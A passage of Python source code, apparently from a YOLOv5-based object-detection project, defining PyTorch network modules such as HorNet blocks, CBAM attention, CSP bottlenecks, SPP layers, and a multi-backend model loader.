get_dwconv(dim, kernel, bias):\n return nn.Conv2d(dim, dim, kernel_size=kernel, padding=(kernel-1)//2 ,bias=bias, groups=dim)\n# HorNet结合YOLO ==end==\n\n\n# add by liuqian 2022-08-29 \n# == HorBlock模块 start ==\nclass HorBlock(nn.Module):# HorBlock模块\n r\"\"\" HorNet block yoloair\n \"\"\"\n def __init__(self, dim, drop_path=0., layer_scale_init_value=1e-6, gnconv=gnconv):\n super().__init__()\n\n self.norm1 = HorLayerNorm(dim, eps=1e-6, data_format='channels_first')\n self.gnconv = gnconv(dim)\n self.norm2 = HorLayerNorm(dim, eps=1e-6)\n self.pwconv1 = nn.Linear(dim, 4 * dim)\n self.act = nn.GELU()\n self.pwconv2 = nn.Linear(4 * dim, dim)\n self.gamma1 = nn.Parameter(layer_scale_init_value * torch.ones(dim), \n requires_grad=True) if layer_scale_init_value > 0 else None\n self.gamma2 = nn.Parameter(layer_scale_init_value * torch.ones((dim)), \n requires_grad=True) if layer_scale_init_value > 0 else None\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n\n def forward(self, x):\n B, C, H, W = x.shape # [512]\n if self.gamma1 is not None:\n gamma1 = self.gamma1.view(C, 1, 1)\n else:\n gamma1 = 1\n x = x + self.drop_path(gamma1 * self.gnconv(self.norm1(x)))\n input = x\n x = x.permute(0, 2, 3, 1) # (N, C, H, W) -> (N, H, W, C)\n x = self.norm2(x)\n x = self.pwconv1(x)\n x = self.act(x)\n x = self.pwconv2(x)\n if self.gamma2 is not None:\n x = self.gamma2 * x\n x = x.permute(0, 3, 1, 2) # (N, H, W, C) -> (N, C, H, W)\n x = input + self.drop_path(x)\n return x\n# == HorBlock模块 end ==\n\nclass Conv(nn.Module):\n # Standard convolution\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g, bias=False)\n self.bn = nn.BatchNorm2d(c2)\n self.act = nn.SiLU() if act is True else (act if isinstance(act, nn.Module) else nn.Identity())\n\n def forward(self, x):\n return self.act(self.bn(self.conv(x)))\n\n def forward_fuse(self, x):\n return self.act(self.conv(x))\n\n\nclass DWConv(Conv):\n # Depth-wise convolution class\n def __init__(self, c1, c2, k=1, s=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__(c1, c2, k, s, g=math.gcd(c1, c2), act=act)\n\n\nclass TransformerLayer(nn.Module):\n # Transformer layer https://arxiv.org/abs/2010.11929 (LayerNorm layers removed for better performance)\n def __init__(self, c, num_heads):\n super().__init__()\n self.q = nn.Linear(c, c, bias=False)\n self.k = nn.Linear(c, c, bias=False)\n self.v = nn.Linear(c, c, bias=False)\n self.ma = nn.MultiheadAttention(embed_dim=c, num_heads=num_heads)\n self.fc1 = nn.Linear(c, c, bias=False)\n self.fc2 = nn.Linear(c, c, bias=False)\n\n def forward(self, x):\n x = self.ma(self.q(x), self.k(x), self.v(x))[0] + x\n x = self.fc2(self.fc1(x)) + x\n return x\n\n\nclass TransformerBlock(nn.Module):\n # Vision Transformer https://arxiv.org/abs/2010.11929\n def __init__(self, c1, c2, num_layers, num_heads):\n super().__init__()\n self.conv = None\n if c1 != c2:\n self.conv = Conv(c1, c2)\n self.linear = nn.Linear(c2, c2) # learnable position embedding\n self.tr = nn.Sequential(*(TransformerLayer(c2, num_heads) for _ in range(num_layers)))\n self.c2 = c2\n\n def forward(self, x):\n if self.conv is not None:\n x = self.conv(x)\n b, _, w, h = x.shape\n p = x.flatten(2).permute(2, 0, 1)\n return self.tr(p + self.linear(p)).permute(1, 2, 0).reshape(b, self.c2, w, h)\n\n\nclass CBAM(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n\n\nclass CBAM2(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM2, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out1 = self.channel_attention(x) * x\n out2 = self.spatial_attention(x) * x\n return out1 + out2\n\n\nclass PAM(nn.Module):\n def __init__(self, c1, c2):\n super(PAM, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n self.spatial_attention = CoorAttention()\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n out = self.spatial_attention(out) * out\n return out\n\nclass CoorAttention(nn.Module):\n def __init__(self, kernel_size = 7):\n super(CoorAttention, self).__init__()\n # [B, C, H, W] -> [B, C, H, 1]\n self.pool_h = nn.AdaptiveAvgPool2d((None, 1))\n # [B, C, H, W] -> [B, C, 1, W]\n self.pool_w = nn.AdaptiveAvgPool2d((1, None))\n\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n n,c,h,w = x.size()\n # [B, C, H, W] -> [B, C, H, 1] -> [B, 1, H, 1]\n x_h = self.pool_h(x) # h avg pool\n avg_out1 = torch.mean(x_h, dim=1, keepdim=True)\n\n # [B, C, H, W] -> [B, C, 1, W] -> [B, 1, 1, W]\n x_w = self.pool_w(x) # w avg pool\n avg_out2, a = torch.max(x_w, dim=1, keepdim=True)\n\n avg_out = avg_out1.expand(-1, -1, -1, w) + avg_out2.expand(-1, -1, h, -1)\n\n # [B, C, H, W] -> [B, C, H, 1] -> [B, 1, H, 1]\n x_h = self.pool_h(x) # h max pool\n max_out1 = torch.mean(x_h, dim=1, keepdim=True)\n \n # [B, C, H, W] -> [B, C, 1, W] -> [B, 1, 1, W]\n x_w = self.pool_w(x) # w max pool\n max_out2, b = torch.max(x_w, dim=1, keepdim=True)\n\n max_out = max_out1.expand(-1, -1, -1, w) + max_out2.expand(-1, -1, h, -1)\n\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_planes, ratio=16):\n \"\"\"\n :params: in_planes 输入模块的feature map的channel\n :params: ratio 降维/升维因子\n 通道注意力则是将一个通道内的信息直接进行全局处理,容易忽略通道内的信息交互\n \"\"\"\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1) # 平均池化,是取整个channel所有元素的均值 [3,5,5] => [3,1,1]\n self.max_pool = nn.AdaptiveMaxPool2d(1) # 最大池化,是取整个channel所有元素的最大值[3,5,5] => [3,1,1]\n\n # shared MLP\n self.mlp = nn.Sequential(\n Flatten(),\n nn.Linear(in_planes, in_planes // ratio),\n nn.ReLU(),\n nn.Linear(in_planes // ratio, in_planes)\n )\n\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.mlp(self.avg_pool(x))\n max_out = self.mlp(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out).unsqueeze(2).unsqueeze(3).expand_as(x)\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size=7):\n \"\"\"对空间注意力来说,由于将每个通道中的特征都做同等处理,容易忽略通道间的信息交互\"\"\"\n super(SpatialAttention, self).__init__()\n\n # 这里要保持卷积后的feature尺度不变,必须要padding=kernel_size//2\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x): # 输入x = [b, c, 56, 56]\n avg_out = torch.mean(x, dim=1, keepdim=True) # avg_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的平均值\n max_out, _ = torch.max(x, dim=1, keepdim=True) # max_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的最大值\n x = torch.cat([avg_out, max_out], dim=1) # x = [b, 2, 56, 56] concat操作\n x = self.conv1(x) # x = [b, 1, 56, 56] 卷积操作,融合avg和max的信息,全方面考虑\n return self.sigmoid(x)\n\n\nclass CBAM3(nn.Module):\n def __init__(self, c1, c2):\n super(CBAM3, self).__init__()\n self.channel_attention = ChannelAttention2(c1)\n self.spatial_attention = SpatialAttention2()\n\n def forward(self, x):\n out1 = self.channel_attention(x) * x\n out2 = self.spatial_attention(x) * x\n return out1 + out2\n\n\nclass ChannelAttention2(nn.Module):\n def __init__(self, in_planes, ratio=16):\n \"\"\"\n :params: in_planes 输入模块的feature map的channel\n :params: ratio 降维/升维因子\n 通道注意力则是将一个通道内的信息直接进行全局处理,容易忽略通道内的信息交互\n \"\"\"\n super(ChannelAttention2, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1) # 平均池化,是取整个channel所有元素的均值 [3,5,5] => [3,1,1]\n self.max_pool = nn.AdaptiveMaxPool2d(1) # 最大池化,是取整个channel所有元素的最大值[3,5,5] => [3,1,1]\n\n # shared MLP\n self.fc1 = nn.Conv2d(in_planes, in_planes // ratio, 1, bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_planes // ratio, in_planes, 1, bias=False)\n\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention2(nn.Module):\n def __init__(self, kernel_size=3):\n super(SpatialAttention2, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size, dilation=3, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x): # 输入x = [b, c, 56, 56]\n avg_out = torch.mean(x, dim=1, keepdim=True) # avg_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的平均值\n max_out, _ = torch.max(x, dim=1, keepdim=True) # max_out = [b, 1, 56, 56] 求x的每个像素在所有channel相同位置上的最大值\n x = torch.cat([avg_out, max_out], dim=1) # x = [b, 2, 56, 56] concat操作\n x = self.conv1(x) # x = [b, 1, 56, 56] 卷积操作,融合avg和max的信息,全方面考虑\n return self.sigmoid(x)\n\n\nclass Bottleneck(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\n\nclass Bottleneck_AM(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.am = CBAM(c_, c_)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.am(self.cv1(x))) if self.add else self.cv2(self.am(self.cv1(x)))\n\n\nclass Bottleneck_AM2(nn.Module):\n # Standard bottleneck\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.am = CBAM3(c_, c_)\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.am(self.cv1(x))) if self.add else self.cv2(self.am(self.cv1(x)))\n\n\nclass BottleneckCSP(nn.Module):\n # CSP Bottleneck https://github.com/WongKinYiu/CrossStagePartialNetworks\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False)\n self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False)\n self.cv4 = Conv(2 * c_, c2, 1, 1)\n self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3)\n self.act = nn.SiLU()\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n def forward(self, x):\n y1 = self.cv3(self.m(self.cv1(x)))\n y2 = self.cv2(x)\n return self.cv4(self.act(self.bn(torch.cat((y1, y2), dim=1))))\n\n\nclass C3(nn.Module):\n # CSP Bottleneck with 3 convolutions\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), dim=1))\n\n\nclass C3AM(nn.Module):\n # CSP Bottleneck with 3 convolutions and CBAM\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c1, c_, 1, 1)\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\n self.am = CBAM(c_, c_)\n self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n return self.cv3(torch.cat((self.m(self.am(self.cv1(x))), self.cv2(x)), dim=1))\n\n\nclass C3AM2(C3):\n # C3 module with Bottleneck_AM()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = nn.Sequential(*(Bottleneck_AM(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n\nclass C3AM3(C3):\n # C3 module with Bottleneck_AM2()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = nn.Sequential(*(Bottleneck_AM2(c_, c_, shortcut, g, e=1.0) for _ in range(n)))\n\n\nclass C3TR(C3):\n # C3 module with TransformerBlock()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = TransformerBlock(c_, c_, 4, n)\n\n\nclass C3SPP(C3):\n # C3 module with SPP()\n def __init__(self, c1, c2, k=(5, 9, 13), n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e)\n self.m = SPP(c_, c_, k)\n\n\nclass C3Ghost(C3):\n # C3 module with GhostBottleneck()\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):\n super().__init__(c1, c2, n, shortcut, g, e)\n c_ = int(c2 * e) # hidden channels\n self.m = nn.Sequential(*(GhostBottleneck(c_, c_) for _ in range(n)))\n\n\nclass CAM(nn.Module):\n def __init__(self, c1, c2):\n super(CAM, self).__init__()\n self.channel_attention = ChannelAttention(c1)\n\n def forward(self, x):\n out = self.channel_attention(x) * x\n return out\n\n\nclass SAM(nn.Module):\n def __init__(self, c1, c2):\n super(SAM, self).__init__()\n self.spatial_attention = SpatialAttention()\n\n def forward(self, x):\n out = self.spatial_attention(x) * x\n return out\n\n\nclass SPP(nn.Module):\n # Spatial Pyramid Pooling (SPP) layer https://arxiv.org/abs/1406.4729\n def __init__(self, c1, c2, k=(5, 9, 13)):\n super().__init__()\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1)\n self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])\n\n def forward(self, x):\n x = self.cv1(x)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning\n return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1))\n\n\nclass SPPF(nn.Module):\n # Spatial Pyramid Pooling - Fast (SPPF) layer for YOLOv5 by Glenn Jocher\n def __init__(self, c1, c2, k=5): # equivalent to SPP(k=(5, 9, 13))\n super().__init__()\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = Conv(c_ * 4, c2, 1, 1)\n self.m = nn.MaxPool2d(kernel_size=k, stride=1, padding=k // 2)\n\n def forward(self, x):\n x = self.cv1(x)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning\n y1 = self.m(x)\n y2 = self.m(y1)\n return self.cv2(torch.cat([x, y1, y2, self.m(y2)], 1))\n\n\nclass Focus(nn.Module):\n # Focus wh information into c-space\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.conv = Conv(c1 * 4, c2, k, s, p, g, act)\n # self.contract = Contract(gain=2)\n\n def forward(self, x): # x(b,c,w,h) -> y(b,4c,w/2,h/2)\n return self.conv(torch.cat([x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]], 1))\n # return self.conv(self.contract(x))\n\n\nclass GhostConv(nn.Module):\n # Ghost Convolution https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups\n super().__init__()\n c_ = c2 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, k, s, None, g, act)\n self.cv2 = Conv(c_, c_, 5, 1, None, c_, act)\n\n def forward(self, x):\n y = self.cv1(x)\n return torch.cat([y, self.cv2(y)], 1)\n\n\nclass GhostBottleneck(nn.Module):\n # Ghost Bottleneck https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=3, s=1): # ch_in, ch_out, kernel, stride\n super().__init__()\n c_ = c2 // 2\n self.conv = nn.Sequential(GhostConv(c1, c_, 1, 1), # pw\n DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw\n GhostConv(c_, c2, 1, 1, act=False)) # pw-linear\n self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False),\n Conv(c1, c2, 1, 1, act=False)) if s == 2 else nn.Identity()\n\n def forward(self, x):\n return self.conv(x) + self.shortcut(x)\n\n\nclass Contract(nn.Module):\n # Contract width-height into channels, i.e. x(1,64,80,80) to x(1,256,40,40)\n def __init__(self, gain=2):\n super().__init__()\n self.gain = gain\n\n def forward(self, x):\n b, c, h, w = x.size() # assert (h / s == 0) and (W / s == 0), 'Indivisible gain'\n s = self.gain\n x = x.view(b, c, h // s, s, w // s, s) # x(1,64,40,2,40,2)\n x = x.permute(0, 3, 5, 1, 2, 4).contiguous() # x(1,2,2,64,40,40)\n return x.view(b, c * s * s, h // s, w // s) # x(1,256,40,40)\n\n\nclass Expand(nn.Module):\n # Expand channels into width-height, i.e. x(1,64,80,80) to x(1,16,160,160)\n def __init__(self, gain=2):\n super().__init__()\n self.gain = gain\n\n def forward(self, x):\n b, c, h, w = x.size() # assert C / s ** 2 == 0, 'Indivisible gain'\n s = self.gain\n x = x.view(b, s, s, c // s ** 2, h, w) # x(1,2,2,16,80,80)\n x = x.permute(0, 3, 4, 1, 5, 2).contiguous() # x(1,16,80,2,80,2)\n return x.view(b, c // s ** 2, h * s, w * s) # x(1,16,160,160)\n\n\nclass Reshape(nn.Module):\n def __init__(self, c1, c2):\n super().__init__()\n self.avg_pool = nn.AvgPool2d(2, 2)\n self.conv = nn.Conv2d(c1, c2, 1, 1, bias=False)\n\n def forward(self, x):\n return self.conv(self.avg_pool(x))\n\n\nclass Concat(nn.Module):\n # Concatenate a list of tensors along dimension\n def __init__(self, dimension=1):\n super().__init__()\n self.d = dimension\n\n def forward(self, x):\n return torch.cat(x, self.d)\n\n\nclass Concat3(nn.Module):\n def __init__(self, dimension=1):\n super(Concat3, self).__init__()\n self.d = dimension\n # 设置可学习参数 nn.Parameter的作用是:将一个不可训练的类型Tensor转换成可以训练的类型parameter\n # 并且会向宿主模型注册该参数 成为其一部分 即model.parameters()会包含这个parameter\n # 从而在参数优化的时候可以自动一起优化\n self.w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)\n self.epsilon = 0.0001\n\n def forward(self, x):\n w = self.w\n weight = w / (torch.sum(w, dim=0) + self.epsilon) # 将权重进行归一化\n # Fast normalized fusion\n x = [weight[0] * x[0], weight[1] * x[1], weight[2] * x[2]]\n return torch.cat(x, self.d)\n\n\nclass Add(nn.Module):\n def __init__(self, c1, c2):\n super().__init__()\n self.conv = nn.Conv2d(c1, c2, 1, 1, bias=False)\n\n def forward(self, x):\n self.conv(x[0])\n return torch.add(*x)\n\n\nclass DetectMultiBackend(nn.Module):\n # YOLOv5 MultiBackend class for python inference on various backends\n def __init__(self, weights='yolov5s.pt', device=None, dnn=True):\n # Usage:\n # PyTorch: weights = *.pt\n # TorchScript: *.torchscript.pt\n # CoreML: *.mlmodel\n # TensorFlow: *_saved_model\n # TensorFlow: *.pb\n # TensorFlow Lite: *.tflite\n # ONNX Runtime: *.onnx\n # OpenCV DNN: *.onnx with dnn=True\n super().__init__()\n w = str(weights[0] if isinstance(weights, list) else weights)\n suffix, suffixes = Path(w).suffix.lower(), ['.pt', '.onnx', '.tflite', '.pb', '', '.mlmodel']\n check_suffix(w, suffixes) # check weights have acceptable suffix\n pt, onnx, tflite, pb, saved_model, coreml = (suffix == x for x in suffixes) # backend booleans\n jit = pt and 'torchscript' in w.lower()\n stride, names = 64, [f'class{i}' for i in range(1000)] # assign defaults\n\n if jit: # TorchScript\n LOGGER.info(f'Loading {w} for TorchScript inference...')\n extra_files = {'config.txt': ''} # model metadata\n model = torch.jit.load(w, _extra_files=extra_files)\n if extra_files['config.txt']:\n d = json.loads(extra_files['config.txt']) # extra_files dict\n stride, names = int(d['stride']), d['names']\n elif pt: # PyTorch\n from models.experimental import attempt_load # scoped to avoid circular import\n model = torch.jit.load(w) if 'torchscript' in w else attempt_load(weights, map_location=device)\n stride = int(model.stride.max()) # model stride\n names = model.module.names if hasattr(model, 'module') else model.names # get class names\n elif coreml: # CoreML *.mlmodel\n import coremltools as ct\n model = ct.models.MLModel(w)\n elif dnn: # ONNX OpenCV DNN\n LOGGER.info(f'Loading {w} for ONNX OpenCV DNN inference...')\n check_requirements(('opencv-python>=4.5.4',))\n net = cv2.dnn.readNetFromONNX(w)\n elif onnx: # ONNX Runtime\n LOGGER.info(f'Loading {w} for ONNX Runtime inference...')\n check_requirements(('onnx', 'onnxruntime-gpu' if torch.has_cuda else 'onnxruntime'))\n import onnxruntime\n session = onnxruntime.InferenceSession(w, None)\n else: # TensorFlow model (TFLite, pb, saved_model)\n import tensorflow as tf\n if pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt\n def wrap_frozen_graph(gd, inputs, outputs):\n x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=\"\"), []) # wrapped\n return x.prune(tf.nest.map_structure(x.graph.as_graph_element, inputs),\n tf.nest.map_structure(x.graph.as_graph_element, outputs))\n\n LOGGER.info(f'Loading {w} for TensorFlow *.pb inference...')\n graph_def = tf.Graph().as_graph_def()\n graph_def.ParseFromString(open(w, 'rb').read())\n frozen_func = wrap_frozen_graph(gd=graph_def, inputs=\"x:0\", outputs=\"Identity:0\")\n elif saved_model:\n LOGGER.info(f'Loading {w} for TensorFlow saved_model inference...')\n model = tf.keras.models.load_model(w)\n elif tflite: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python\n if 'edgetpu' in w.lower():\n LOGGER.info(f'Loading {w} for TensorFlow Edge TPU inference...')\n import tflite_runtime.interpreter as tfli\n delegate = {'Linux': 'libedgetpu.so.1', # install https://coral.ai/software/#edgetpu-runtime\n 'Darwin': 'libedgetpu.1.dylib',\n 'Windows': 'edgetpu.dll'}[platform.system()]\n interpreter = tfli.Interpreter(model_path=w, experimental_delegates=[tfli.load_delegate(delegate)])\n else:\n LOGGER.info(f'Loading {w} for TensorFlow Lite inference...')\n interpreter = tf.lite.Interpreter(model_path=w) # load TFLite model\n interpreter.allocate_tensors() # allocate\n input_details = interpreter.get_input_details() # inputs\n output_details = interpreter.get_output_details() # outputs\n self.__dict__.update(locals()) # assign all variables to self\n\n def forward(self, im, augment=False, visualize=False, val=False):\n # YOLOv5 MultiBackend inference\n b, ch, h, w = im.shape # batch, channel, height, width\n if self.pt: # PyTorch\n y = self.model(im) if self.jit else self.model(im, augment=augment, visualize=visualize)\n return y if val else y[0]\n elif self.coreml: # CoreML *.mlmodel\n im = im.permute(0, 2, 3, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)\n im = Image.fromarray((im[0] * 255).astype('uint8'))\n # im = im.resize((192, 320), Image.ANTIALIAS)\n y = self.model.predict({'image': im}) # coordinates are xywh normalized\n box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels\n conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float)\n y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1)\n elif self.onnx: # ONNX\n im = im.cpu().numpy() # torch to numpy\n if self.dnn: # ONNX OpenCV DNN\n self.net.setInput(im)\n y = self.net.forward()\n else: # ONNX Runtime\n y = self.session.run([self.session.get_outputs()[0].name], {self.session.get_inputs()[0].name: im})[0]\n else: # TensorFlow model (TFLite, pb, saved_model)\n im = im.permute(0, 2, 3, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)\n if self.pb:\n y = self.frozen_func(x=self.tf.constant(im)).numpy()\n elif self.saved_model:\n y = self.model(im, training=False).numpy()\n elif self.tflite:\n input, output = self.input_details[0], self.output_details[0]\n int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model\n if int8:\n scale, zero_point = input['quantization']\n im = (im / scale + zero_point).astype(np.uint8) # de-scale\n self.interpreter.set_tensor(input['index'], im)\n self.interpreter.invoke()\n y = self.interpreter.get_tensor(output['index'])\n if int8:\n scale, zero_point = output['quantization']\n y = (y.astype(np.float32) - zero_point) * scale # re-scale\n y[..., 0] *= w # x\n y[..., 1] *= h # y\n y[..., 2] *= w # w\n y[..., 3] *= h # h\n y = torch.tensor(y)\n return (y, []) if val else y\n\n\nclass DecoupledHead(nn.Module):\n def __init__(self, ch=256, nc=80, anchors=()):\n super().__init__()\n self.nc = nc # number of classes\n self.nl = len(anchors) # number of detection layers\n self.na = len(anchors[0]) // 2 # number of anchors\n self.merge = Conv(ch, 256 , 1, 1)\n self.cls_convs1 = Conv(256 , 256 , 3, 1, 1)\n self.cls_convs2 = Conv(256 , 256 , 3, 1, 1)\n self.reg_convs1 = Conv(256 , 256 , 3, 1, 1)\n self.reg_convs2 = Conv(256 , 256 , 3, 1, 1)\n self.cls_preds = nn.Conv2d(256 , self.nc * self.na, 1)\n self.reg_preds = nn.Conv2d(256 , 4 * self.na, 1)\n self.obj_preds = nn.Conv2d(256 , 1 * self.na, 1)\n\n def forward(self, x):\n x = self.merge(x)\n x1 = self.cls_convs1(x)\n x1 = self.cls_convs2(x1)\n x1 = self.cls_preds(x1)\n x2 = self.reg_convs1(x)\n x2 = self.reg_convs2(x2)\n x21 = self.reg_preds(x2)\n x22 = self.obj_preds(x2)\n out = torch.cat([x21, x22, x1], 1)\n return out\n\n\nclass AutoShape(nn.Module):\n # YOLOv5 input-robust model wrapper for passing cv2/np/PIL/torch inputs. Includes preprocessing, inference and NMS\n conf = 0.25 # NMS confidence threshold\n iou = 0.45 # NMS IoU threshold\n classes = None # (optional list) filter by class, i.e. = [0, 15, 16] for COCO persons, cats and dogs\n multi_label = False # NMS multiple labels per box\n max_det = 1000 # maximum number of detections per image\n\n def __init__(self, model):\n super().__init__()\n self.model = model.eval()\n\n def autoshape(self):\n LOGGER.info('AutoShape already enabled, skipping... ') # model already converted to model.autoshape()\n return self\n\n def _apply(self, fn):\n # Apply to(), cpu(), cuda(), half() to model tensors that are not parameters or registered buffers\n self = super()._apply(fn)\n m = self.model.model[-1] # Detect()\n m.stride = fn(m.stride)\n m.grid = list(map(fn, m.grid))\n if isinstance(m.anchor_grid, list):\n m.anchor_grid = list(map(fn, m.anchor_grid))\n return self\n\n @torch.no_grad()\n def forward(self, imgs, size=640, augment=False, profile=False):\n # Inference from various sources. For height=640, width=1280, RGB images example inputs are:\n # file: imgs = 'data/images/zidane.jpg' # str or PosixPath\n # URI: = 'https://ultralytics.com/images/zidane.jpg'\n # OpenCV: = cv2.imread('image.jpg')[:,:,::-1] # HWC BGR to RGB x(640,1280,3)\n # PIL: = Image.open('image.jpg') or ImageGrab.grab() # HWC x(640,1280,3)\n # numpy: = np.zeros((640,1280,3)) # HWC\n # torch: = torch.zeros(16,3,320,640) # BCHW (scaled to size=640, 0-1 values)\n # multiple: = [Image.open('image1.jpg'), Image.open('image2.jpg'), ...] # list of images\n\n t = 